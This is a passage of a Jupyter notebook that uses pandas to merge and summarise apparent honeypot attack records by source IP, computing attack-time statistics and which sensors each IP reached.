11,1.100.134.2,[cfd4dc54-499e-43d9-848a-1e390a7c984a],cfd4dc54-499e-43d9-848a-1e390a7c984a
12,1.100.22.156,"[6fc6df50-bee2-453b-9f01-42e438bd22f7, 6fc6df5...",6fc6df50-bee2-453b-9f01-42e438bd22f7
13,1.109.145.112,[cfd4dc54-499e-43d9-848a-1e390a7c984a],cfd4dc54-499e-43d9-848a-1e390a7c984a
14,1.109.23.38,[e15006af-0a5c-4e9e-b8cc-4e6d35c02bcb],e15006af-0a5c-4e9e-b8cc-4e6d35c02bcb
15,1.119.140.226,"[1dd6e3fc-ee4f-4761-ab80-34020706c490, 1dd6e3f...",1dd6e3fc-ee4f-4761-ab80-34020706c490
16,1.119.150.180,"[682fa743-a27c-4afe-8ff1-edab04752f01, 23a24e9...",23a24e9d-11bd-4350-b650-af0e688129ad
17,1.129.110.113,"[a8fed55b-b5f2-4bbc-b77e-b0feb4d1caee, a8fed55...",a8fed55b-b5f2-4bbc-b77e-b0feb4d1caee
18,1.136.109.185,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4
19,1.158.42.147,[6ba6a97a-2b2c-4279-afd9-3a9f8254ef90],6ba6a97a-2b2c-4279-afd9-3a9f8254ef90
20,1.160.202.78,"[14f9bcb6-2325-43ef-83a8-ac3c8a544681, 14f9bcb...",14f9bcb6-2325-43ef-83a8-ac3c8a544681
21,1.160.209.47,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91
22,1.160.237.26,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91
23,1.160.75.193,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91
24,1.161.174.194,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4
25,1.161.184.77,"[3100eaa2-c24c-42c4-8a88-e4619269f447, 3100eaa...",3100eaa2-c24c-42c4-8a88-e4619269f447
26,1.161.213.222,"[49eed2a1-83a4-4968-90cf-1235dd6f88fa, 49eed2a...",49eed2a1-83a4-4968-90cf-1235dd6f88fa
27,1.161.240.208,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91
28,1.161.94.44,"[14f9bcb6-2325-43ef-83a8-ac3c8a544681, 14f9bcb...",14f9bcb6-2325-43ef-83a8-ac3c8a544681
29,1.162.171.118,"[49797144-df1a-424a-841f-3b3faaf19506, 4979714...",49797144-df1a-424a-841f-3b3faaf19506
...,...,...,...
17677,96.244.71.124,[e15006af-0a5c-4e9e-b8cc-4e6d35c02bcb],e15006af-0a5c-4e9e-b8cc-4e6d35c02bcb
17678,96.245.190.226,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91
17679,96.245.198.6,"[49797144-df1a-424a-841f-3b3faaf19506, 4979714...",49797144-df1a-424a-841f-3b3faaf19506
17680,96.30.101.87,"[de61ed70-26c8-4482-a1c0-280945212d73, de61ed7...",de61ed70-26c8-4482-a1c0-280945212d73
17681,96.30.70.153,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4
17682,96.30.71.168,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91
17683,96.30.94.26,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4
17684,96.30.95.194,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91
17685,96.57.82.166,"[c5aa1f90-812b-4bf8-9ac5-219b757ba7b1, c5aa1f9...",cfd4dc54-499e-43d9-848a-1e390a7c984a
17686,96.69.120.161,"[04627cfd-86fc-421d-b770-6b30d455db35, 04627cf...",04627cfd-86fc-421d-b770-6b30d455db35
17687,96.70.41.109,[970757c6-1b54-42d6-8b99-076d30e81ccd],970757c6-1b54-42d6-8b99-076d30e81ccd
17688,96.71.40.78,[53a71a81-7a04-4640-b70c-20283939c259],53a71a81-7a04-4640-b70c-20283939c259
17689,96.75.245.217,"[49797144-df1a-424a-841f-3b3faaf19506, 4979714...",49797144-df1a-424a-841f-3b3faaf19506
17690,96.76.166.105,"[c5aa1f90-812b-4bf8-9ac5-219b757ba7b1, cfd4dc5...",cfd4dc54-499e-43d9-848a-1e390a7c984a
17691,96.76.250.161,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4
17692,96.9.154.23,"[49797144-df1a-424a-841f-3b3faaf19506, 4979714...",14f9bcb6-2325-43ef-83a8-ac3c8a544681
17693,96.92.47.189,"[49eed2a1-83a4-4968-90cf-1235dd6f88fa, 49eed2a...",49eed2a1-83a4-4968-90cf-1235dd6f88fa
17694,97.78.232.134,"[53a71a81-7a04-4640-b70c-20283939c259, 53a71a8...",53a71a81-7a04-4640-b70c-20283939c259
17695,98.102.107.42,"[3100eaa2-c24c-42c4-8a88-e4619269f447, 3100eaa...",3100eaa2-c24c-42c4-8a88-e4619269f447
17696,98.113.35.10,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4
17697,98.143.63.246,[53a71a81-7a04-4640-b70c-20283939c259],53a71a81-7a04-4640-b70c-20283939c259
17698,98.143.67.212,[04627cfd-86fc-421d-b770-6b30d455db35],04627cfd-86fc-421d-b770-6b30d455db35
17699,98.151.110.89,"[d3ba9246-d6a7-4370-9369-47e707ee17fd, d3ba924...",d3ba9246-d6a7-4370-9369-47e707ee17fd
17700,98.153.26.245,"[a8fed55b-b5f2-4bbc-b77e-b0feb4d1caee, a8fed55...",a8fed55b-b5f2-4bbc-b77e-b0feb4d1caee
17701,98.172.135.115,"[49eed2a1-83a4-4968-90cf-1235dd6f88fa, 49eed2a...",49eed2a1-83a4-4968-90cf-1235dd6f88fa
17702,98.198.202.103,[3100eaa2-c24c-42c4-8a88-e4619269f447],3100eaa2-c24c-42c4-8a88-e4619269f447
17703,98.217.250.11,[49eed2a1-83a4-4968-90cf-1235dd6f88fa],49eed2a1-83a4-4968-90cf-1235dd6f88fa
17704,98.6.58.60,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4
17705,99.188.30.66,"[4c2f953b-ffb7-4ac1-b8e6-61e3c36fd59c, 3e6340f...",3e6340f3-dea7-470f-970f-c9291db304b6
17706,99.98.99.67,[53a71a81-7a04-4640-b70c-20283939c259],53a71a81-7a04-4640-b70c-20283939c259

In [18]:
data_final = data_grouped.merge(data_grouped1, left_on='src_ip', right_on='src_ip')
data_final = data_final.merge(data_grouped_td,left_on='src_ip', right_on='src_ip')
data_final = data_final.merge(data_grouped_sd,left_on='src_ip', right_on='src_ip')
data_final = data_final.merge(data_grouped2,left_on='src_ip', right_on='src_ip')
data_final = data_final.rename({'d_time_x':'mean_time_of_attack','d_time_y':'sd_time_of_attack','sensor':'all_sensors'},axis = 1)

In [19]:
data_final

,src_ip,mean_time_of_attack,sd_time_of_attack,mean_time_difference,sd_time_difference,all_sensors,most_common_sensor
0,1.1.155.160,2019-05-20 23:35:08.250000128,11.0,41,11,"[49eed2a1-83a4-4968-90cf-1235dd6f88fa, 49eed2a...",49eed2a1-83a4-4968-90cf-1235dd6f88fa
1,1.1.174.78,2019-05-20 17:17:52.750000128,11.0,41,10,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4
2,1.1.176.59,2019-05-20 05:30:46.000000000,NaN,0,0,[41e1395a-95c5-49a9-8b76-0028e2b0d114],41e1395a-95c5-49a9-8b76-0028e2b0d114
3,1.1.202.4,2019-05-20 03:31:45.500000256,11.0,41,11,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4
4,1.1.210.2,2019-05-20 10:11:08.000000000,12.0,42,11,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91
5,1.1.218.253,2019-05-20 22:34:46.666666752,13.0,56,44,"[49eed2a1-83a4-4968-90cf-1235dd6f88fa, 49eed2a...",49eed2a1-83a4-4968-90cf-1235dd6f88fa
6,1.1.238.231,2019-05-20 21:34:04.500000000,11.0,41,11,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4
7,1.10.137.15,2019-05-20 19:31:02.000000000,NaN,0,0,[da366dbc-3c72-4927-bfc6-73850379ccb0],da366dbc-3c72-4927-bfc6-73850379ccb0
8,1.10.193.152,2019-05-20 04:20:03.583333376,12.0,9,31,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4
9,1.10.199.196,2019-05-20 21:29:14.400000000,28.0,31,54,"[49eed2a1-83a4-4968-90cf-1235dd6f88fa, 49eed2a...",49eed2a1-83a4-4968-90cf-1235dd6f88fa
10,1.10.255.90,2019-05-20 15:51:46.249999872,11.0,41,11,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4
11,1.100.134.2,2019-05-20 20:42:37.000000000,NaN,0,0,[cfd4dc54-499e-43d9-848a-1e390a7c984a],cfd4dc54-499e-43d9-848a-1e390a7c984a
12,1.100.22.156,2019-05-20 07:09:30.000000000,0.0,0,0,"[6fc6df50-bee2-453b-9f01-42e438bd22f7, 6fc6df5...",6fc6df50-bee2-453b-9f01-42e438bd22f7
13,1.109.145.112,2019-05-20 12:45:12.000000000,NaN,0,0,[cfd4dc54-499e-43d9-848a-1e390a7c984a],cfd4dc54-499e-43d9-848a-1e390a7c984a
14,1.109.23.38,2019-05-20 17:26:35.000000000,NaN,0,0,[e15006af-0a5c-4e9e-b8cc-4e6d35c02bcb],e15006af-0a5c-4e9e-b8cc-4e6d35c02bcb
15,1.119.140.226,2019-05-20 00:52:16.599999744,0.0,0,0,"[1dd6e3fc-ee4f-4761-ab80-34020706c490, 1dd6e3f...",1dd6e3fc-ee4f-4761-ab80-34020706c490
16,1.119.150.180,2019-05-20 02:16:25.400000000,18.0,6,13,"[682fa743-a27c-4afe-8ff1-edab04752f01, 23a24e9...",23a24e9d-11bd-4350-b650-af0e688129ad
17,1.129.110.113,2019-05-20 21:57:12.499999744,13.0,42,12,"[a8fed55b-b5f2-4bbc-b77e-b0feb4d1caee, a8fed55...",a8fed55b-b5f2-4bbc-b77e-b0feb4d1caee
18,1.136.109.185,2019-05-20 23:52:49.249999872,11.0,41,11,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4
19,1.158.42.147,2019-05-20 17:53:09.000000000,NaN,0,0,[6ba6a97a-2b2c-4279-afd9-3a9f8254ef90],6ba6a97a-2b2c-4279-afd9-3a9f8254ef90
20,1.160.202.78,2019-05-20 09:21:37.583333376,8.0,2,3,"[14f9bcb6-2325-43ef-83a8-ac3c8a544681, 14f9bcb...",14f9bcb6-2325-43ef-83a8-ac3c8a544681
21,1.160.209.47,2019-05-20 09:17:21.000000000,44.0,58,8,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91
22,1.160.237.26,2019-05-20 21:41:12.500000000,13.0,43,11,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91
23,1.160.75.193,2019-05-20 19:11:49.000000256,17.0,22,30,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91
24,1.161.174.194,2019-05-20 07:37:35.000000000,11.0,41,11,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4
25,1.161.184.77,2019-05-20 00:31:36.500000000,12.0,42,11,"[3100eaa2-c24c-42c4-8a88-e4619269f447, 3100eaa...",3100eaa2-c24c-42c4-8a88-e4619269f447
26,1.161.213.222,2019-05-20 12:01:13.750000128,12.0,42,11,"[49eed2a1-83a4-4968-90cf-1235dd6f88fa, 49eed2a...",49eed2a1-83a4-4968-90cf-1235dd6f88fa
27,1.161.240.208,2019-05-20 07:48:01.750000128,14.0,44,11,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91
28,1.161.94.44,2019-05-20 04:52:36.166666496,9.0,2,3,"[14f9bcb6-2325-43ef-83a8-ac3c8a544681, 14f9bcb...",14f9bcb6-2325-43ef-83a8-ac3c8a544681
29,1.162.171.118,2019-05-20 14:03:57.000000000,0.0,0,0,"[49797144-df1a-424a-841f-3b3faaf19506, 4979714...",49797144-df1a-424a-841f-3b3faaf19506
...,...,...,...,...,...,...,...
17677,96.244.71.124,2019-05-20 07:14:32.000000000,NaN,0,0,[e15006af-0a5c-4e9e-b8cc-4e6d35c02bcb],e15006af-0a5c-4e9e-b8cc-4e6d35c02bcb
17678,96.245.190.226,2019-05-20 19:31:07.000000000,4.0,46,4,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91
17679,96.245.198.6,2019-05-20 06:55:53.500000000,2.0,0,0,"[49797144-df1a-424a-841f-3b3faaf19506, 4979714...",49797144-df1a-424a-841f-3b3faaf19506
17680,96.30.101.87,2019-05-20 21:31:21.000000000,1.0,0,0,"[de61ed70-26c8-4482-a1c0-280945212d73, de61ed7...",de61ed70-26c8-4482-a1c0-280945212d73
17681,96.30.70.153,2019-05-20 12:45:34.000000000,11.0,41,11,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4
17682,96.30.71.168,2019-05-20 02:54:55.599999744,29.0,31,11,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91
17683,96.30.94.26,2019-05-20 05:41:07.333333248,14.0,12,17,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4
17684,96.30.95.194,2019-05-20 08:28:11.000000000,1.0,0,0,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91
17685,96.57.82.166,2019-05-20 12:50:26.499999744,55.0,35,55,"[c5aa1f90-812b-4bf8-9ac5-219b757ba7b1, c5aa1f9...",cfd4dc54-499e-43d9-848a-1e390a7c984a
17686,96.69.120.161,2019-05-20 12:03:41.500000000,30.0,10,0,"[04627cfd-86fc-421d-b770-6b30d455db35, 04627cf...",04627cfd-86fc-421d-b770-6b30d455db35
17687,96.70.41.109,2019-05-20 13:20:10.000000000,NaN,0,0,[970757c6-1b54-42d6-8b99-076d30e81ccd],970757c6-1b54-42d6-8b99-076d30e81ccd
17688,96.71.40.78,2019-05-20 22:10:18.000000000,NaN,0,0,[53a71a81-7a04-4640-b70c-20283939c259],53a71a81-7a04-4640-b70c-20283939c259
17689,96.75.245.217,2019-05-20 12:34:23.000000000,0.0,0,0,"[49797144-df1a-424a-841f-3b3faaf19506, 4979714...",49797144-df1a-424a-841f-3b3faaf19506
17690,96.76.166.105,2019-05-20 12:20:07.800000000,9.0,3,38,"[c5aa1f90-812b-4bf8-9ac5-219b757ba7b1, cfd4dc5...",cfd4dc54-499e-43d9-848a-1e390a7c984a
17691,96.76.250.161,2019-05-20 15:14:38.913043200,26.0,15,53,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4
17692,96.9.154.23,2019-05-20 09:36:22.750000128,43.0,52,40,"[49797144-df1a-424a-841f-3b3faaf19506, 4979714...",14f9bcb6-2325-43ef-83a8-ac3c8a544681
17693,96.92.47.189,2019-05-20 18:33:06.800000000,31.0,10,0,"[49eed2a1-83a4-4968-90cf-1235dd6f88fa, 49eed2a...",49eed2a1-83a4-4968-90cf-1235dd6f88fa
17694,97.78.232.134,2019-05-20 10:56:46.511110656,20.0,10,0,"[53a71a81-7a04-4640-b70c-20283939c259, 53a71a8...",53a71a81-7a04-4640-b70c-20283939c259
17695,98.102.107.42,2019-05-20 00:35:26.000000000,11.0,41,11,"[3100eaa2-c24c-42c4-8a88-e4619269f447, 3100eaa...",3100eaa2-c24c-42c4-8a88-e4619269f447
17696,98.113.35.10,2019-05-20 16:52:10.875000064,51.0,16,31,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4
17697,98.143.63.246,2019-05-20 17:10:46.000000000,NaN,0,0,[53a71a81-7a04-4640-b70c-20283939c259],53a71a81-7a04-4640-b70c-20283939c259
17698,98.143.67.212,2019-05-20 16:45:09.000000000,NaN,0,0,[04627cfd-86fc-421d-b770-6b30d455db35],04627cfd-86fc-421d-b770-6b30d455db35
17699,98.151.110.89,2019-05-20 04:29:30.000000000,0.0,0,0,"[d3ba9246-d6a7-4370-9369-47e707ee17fd, d3ba924...",d3ba9246-d6a7-4370-9369-47e707ee17fd
17700,98.153.26.245,2019-05-20 10:21:55.000000000,36.0,57,6,"[a8fed55b-b5f2-4bbc-b77e-b0feb4d1caee, a8fed55...",a8fed55b-b5f2-4bbc-b77e-b0feb4d1caee
17701,98.172.135.115,2019-05-20 10:21:59.749999872,11.0,41,10,"[49eed2a1-83a4-4968-90cf-1235dd6f88fa, 49eed2a...",49eed2a1-83a4-4968-90cf-1235dd6f88fa
17702,98.198.202.103,2019-05-20 17:16:57.000000000,NaN,0,0,[3100eaa2-c24c-42c4-8a88-e4619269f447],3100eaa2-c24c-42c4-8a88-e4619269f447
17703,98.217.250.11,2019-05-20 07:57:57.000000000,NaN,0,0,[49eed2a1-83a4-4968-90cf-1235dd6f88fa],49eed2a1-83a4-4968-90cf-1235dd6f88fa
17704,98.6.58.60,2019-05-20 19:03:18.749999872,12.0,42,11,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4
17705,99.188.30.66,2019-05-20 11:25:11.333333248,48.0,44,24,"[4c2f953b-ffb7-4ac1-b8e6-61e3c36fd59c, 3e6340f...",3e6340f3-dea7-470f-970f-c9291db304b6
17706,99.98.99.67,2019-05-20 12:37:49.000000000,NaN,0,0,[53a71a81-7a04-4640-b70c-20283939c259],53a71a81-7a04-4640-b70c-20283939c259

In [27]:
data_final["all_sensors"].iloc[0]

['49eed2a1-83a4-4968-90cf-1235dd6f88fa',
 '49eed2a1-83a4-4968-90cf-1235dd6f88fa',
 '49eed2a1-83a4-4968-90cf-1235dd6f88fa',
 '49eed2a1-83a4-4968-90cf-1235dd6f88fa']

In [29]:
data_final["sensor_number"] = data_final["all_sensors"].apply(len)
data_final

,src_ip,mean_time_of_attack,sd_time_of_attack,mean_time_difference,sd_time_difference,all_sensors,most_common_sensor,sensor_number
0,1.1.155.160,2019-05-20 23:35:08.250000128,11.0,41,11,"[49eed2a1-83a4-4968-90cf-1235dd6f88fa, 49eed2a...",49eed2a1-83a4-4968-90cf-1235dd6f88fa,4
1,1.1.174.78,2019-05-20 17:17:52.750000128,11.0,41,10,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4,4
2,1.1.176.59,2019-05-20 05:30:46.000000000,NaN,0,0,[41e1395a-95c5-49a9-8b76-0028e2b0d114],41e1395a-95c5-49a9-8b76-0028e2b0d114,1
3,1.1.202.4,2019-05-20 03:31:45.500000256,11.0,41,11,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4,4
4,1.1.210.2,2019-05-20 10:11:08.000000000,12.0,42,11,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91,4
5,1.1.218.253,2019-05-20 22:34:46.666666752,13.0,56,44,"[49eed2a1-83a4-4968-90cf-1235dd6f88fa, 49eed2a...",49eed2a1-83a4-4968-90cf-1235dd6f88fa,3
6,1.1.238.231,2019-05-20 21:34:04.500000000,11.0,41,11,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4,4
7,1.10.137.15,2019-05-20 19:31:02.000000000,NaN,0,0,[da366dbc-3c72-4927-bfc6-73850379ccb0],da366dbc-3c72-4927-bfc6-73850379ccb0,1
8,1.10.193.152,2019-05-20 04:20:03.583333376,12.0,9,31,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4,12
9,1.10.199.196,2019-05-20 21:29:14.400000000,28.0,31,54,"[49eed2a1-83a4-4968-90cf-1235dd6f88fa, 49eed2a...",49eed2a1-83a4-4968-90cf-1235dd6f88fa,5
10,1.10.255.90,2019-05-20 15:51:46.249999872,11.0,41,11,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4,4
11,1.100.134.2,2019-05-20 20:42:37.000000000,NaN,0,0,[cfd4dc54-499e-43d9-848a-1e390a7c984a],cfd4dc54-499e-43d9-848a-1e390a7c984a,1
12,1.100.22.156,2019-05-20 07:09:30.000000000,0.0,0,0,"[6fc6df50-bee2-453b-9f01-42e438bd22f7, 6fc6df5...",6fc6df50-bee2-453b-9f01-42e438bd22f7,2
13,1.109.145.112,2019-05-20 12:45:12.000000000,NaN,0,0,[cfd4dc54-499e-43d9-848a-1e390a7c984a],cfd4dc54-499e-43d9-848a-1e390a7c984a,1
14,1.109.23.38,2019-05-20 17:26:35.000000000,NaN,0,0,[e15006af-0a5c-4e9e-b8cc-4e6d35c02bcb],e15006af-0a5c-4e9e-b8cc-4e6d35c02bcb,1
15,1.119.140.226,2019-05-20 00:52:16.599999744,0.0,0,0,"[1dd6e3fc-ee4f-4761-ab80-34020706c490, 1dd6e3f...",1dd6e3fc-ee4f-4761-ab80-34020706c490,5
16,1.119.150.180,2019-05-20 02:16:25.400000000,18.0,6,13,"[682fa743-a27c-4afe-8ff1-edab04752f01, 23a24e9...",23a24e9d-11bd-4350-b650-af0e688129ad,10
17,1.129.110.113,2019-05-20 21:57:12.499999744,13.0,42,12,"[a8fed55b-b5f2-4bbc-b77e-b0feb4d1caee, a8fed55...",a8fed55b-b5f2-4bbc-b77e-b0feb4d1caee,4
18,1.136.109.185,2019-05-20 23:52:49.249999872,11.0,41,11,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4,4
19,1.158.42.147,2019-05-20 17:53:09.000000000,NaN,0,0,[6ba6a97a-2b2c-4279-afd9-3a9f8254ef90],6ba6a97a-2b2c-4279-afd9-3a9f8254ef90,1
20,1.160.202.78,2019-05-20 09:21:37.583333376,8.0,2,3,"[14f9bcb6-2325-43ef-83a8-ac3c8a544681, 14f9bcb...",14f9bcb6-2325-43ef-83a8-ac3c8a544681,12
21,1.160.209.47,2019-05-20 09:17:21.000000000,44.0,58,8,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91,8
22,1.160.237.26,2019-05-20 21:41:12.500000000,13.0,43,11,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91,4
23,1.160.75.193,2019-05-20 19:11:49.000000256,17.0,22,30,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91,3
24,1.161.174.194,2019-05-20 07:37:35.000000000,11.0,41,11,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4,4
25,1.161.184.77,2019-05-20 00:31:36.500000000,12.0,42,11,"[3100eaa2-c24c-42c4-8a88-e4619269f447, 3100eaa...",3100eaa2-c24c-42c4-8a88-e4619269f447,4
26,1.161.213.222,2019-05-20 12:01:13.750000128,12.0,42,11,"[49eed2a1-83a4-4968-90cf-1235dd6f88fa, 49eed2a...",49eed2a1-83a4-4968-90cf-1235dd6f88fa,4
27,1.161.240.208,2019-05-20 07:48:01.750000128,14.0,44,11,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91,4
28,1.161.94.44,2019-05-20 04:52:36.166666496,9.0,2,3,"[14f9bcb6-2325-43ef-83a8-ac3c8a544681, 14f9bcb...",14f9bcb6-2325-43ef-83a8-ac3c8a544681,12
29,1.162.171.118,2019-05-20 14:03:57.000000000,0.0,0,0,"[49797144-df1a-424a-841f-3b3faaf19506, 4979714...",49797144-df1a-424a-841f-3b3faaf19506,2
...,...,...,...,...,...,...,...,...
17677,96.244.71.124,2019-05-20 07:14:32.000000000,NaN,0,0,[e15006af-0a5c-4e9e-b8cc-4e6d35c02bcb],e15006af-0a5c-4e9e-b8cc-4e6d35c02bcb,1
17678,96.245.190.226,2019-05-20 19:31:07.000000000,4.0,46,4,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91,4
17679,96.245.198.6,2019-05-20 06:55:53.500000000,2.0,0,0,"[49797144-df1a-424a-841f-3b3faaf19506, 4979714...",49797144-df1a-424a-841f-3b3faaf19506,2
17680,96.30.101.87,2019-05-20 21:31:21.000000000,1.0,0,0,"[de61ed70-26c8-4482-a1c0-280945212d73, de61ed7...",de61ed70-26c8-4482-a1c0-280945212d73,2
17681,96.30.70.153,2019-05-20 12:45:34.000000000,11.0,41,11,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4,4
17682,96.30.71.168,2019-05-20 02:54:55.599999744,29.0,31,11,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91,5
17683,96.30.94.26,2019-05-20 05:41:07.333333248,14.0,12,17,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4,3
17684,96.30.95.194,2019-05-20 08:28:11.000000000,1.0,0,0,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91,2
17685,96.57.82.166,2019-05-20 12:50:26.499999744,55.0,35,55,"[c5aa1f90-812b-4bf8-9ac5-219b757ba7b1, c5aa1f9...",cfd4dc54-499e-43d9-848a-1e390a7c984a,4
17686,96.69.120.161,2019-05-20 12:03:41.500000000,30.0,10,0,"[04627cfd-86fc-421d-b770-6b30d455db35, 04627cf...",04627cfd-86fc-421d-b770-6b30d455db35,10
17687,96.70.41.109,2019-05-20 13:20:10.000000000,NaN,0,0,[970757c6-1b54-42d6-8b99-076d30e81ccd],970757c6-1b54-42d6-8b99-076d30e81ccd,1
17688,96.71.40.78,2019-05-20 22:10:18.000000000,NaN,0,0,[53a71a81-7a04-4640-b70c-20283939c259],53a71a81-7a04-4640-b70c-20283939c259,1
17689,96.75.245.217,2019-05-20 12:34:23.000000000,0.0,0,0,"[49797144-df1a-424a-841f-3b3faaf19506, 4979714...",49797144-df1a-424a-841f-3b3faaf19506,2
17690,96.76.166.105,2019-05-20 12:20:07.800000000,9.0,3,38,"[c5aa1f90-812b-4bf8-9ac5-219b757ba7b1, cfd4dc5...",cfd4dc54-499e-43d9-848a-1e390a7c984a,5
17691,96.76.250.161,2019-05-20 15:14:38.913043200,26.0,15,53,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4,23
17692,96.9.154.23,2019-05-20 09:36:22.750000128,43.0,52,40,"[49797144-df1a-424a-841f-3b3faaf19506, 4979714...",14f9bcb6-2325-43ef-83a8-ac3c8a544681,4
17693,96.92.47.189,2019-05-20 18:33:06.800000000,31.0,10,0,"[49eed2a1-83a4-4968-90cf-1235dd6f88fa, 49eed2a...",49eed2a1-83a4-4968-90cf-1235dd6f88fa,10
17694,97.78.232.134,2019-05-20 10:56:46.511110656,20.0,10,0,"[53a71a81-7a04-4640-b70c-20283939c259, 53a71a8...",53a71a81-7a04-4640-b70c-20283939c259,45
17695,98.102.107.42,2019-05-20 00:35:26.000000000,11.0,41,11,"[3100eaa2-c24c-42c4-8a88-e4619269f447, 3100eaa...",3100eaa2-c24c-42c4-8a88-e4619269f447,4
17696,98.113.35.10,2019-05-20 16:52:10.875000064,51.0,16,31,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4,8
17697,98.143.63.246,2019-05-20 17:10:46.000000000,NaN,0,0,[53a71a81-7a04-4640-b70c-20283939c259],53a71a81-7a04-4640-b70c-20283939c259,1
17698,98.143.67.212,2019-05-20 16:45:09.000000000,NaN,0,0,[04627cfd-86fc-421d-b770-6b30d455db35],04627cfd-86fc-421d-b770-6b30d455db35,1
17699,98.151.110.89,2019-05-20 04:29:30.000000000,0.0,0,0,"[d3ba9246-d6a7-4370-9369-47e707ee17fd, d3ba924...",d3ba9246-d6a7-4370-9369-47e707ee17fd,2
17700,98.153.26.245,2019-05-20 10:21:55.000000000,36.0,57,6,"[a8fed55b-b5f2-4bbc-b77e-b0feb4d1caee, a8fed55...",a8fed55b-b5f2-4bbc-b77e-b0feb4d1caee,5
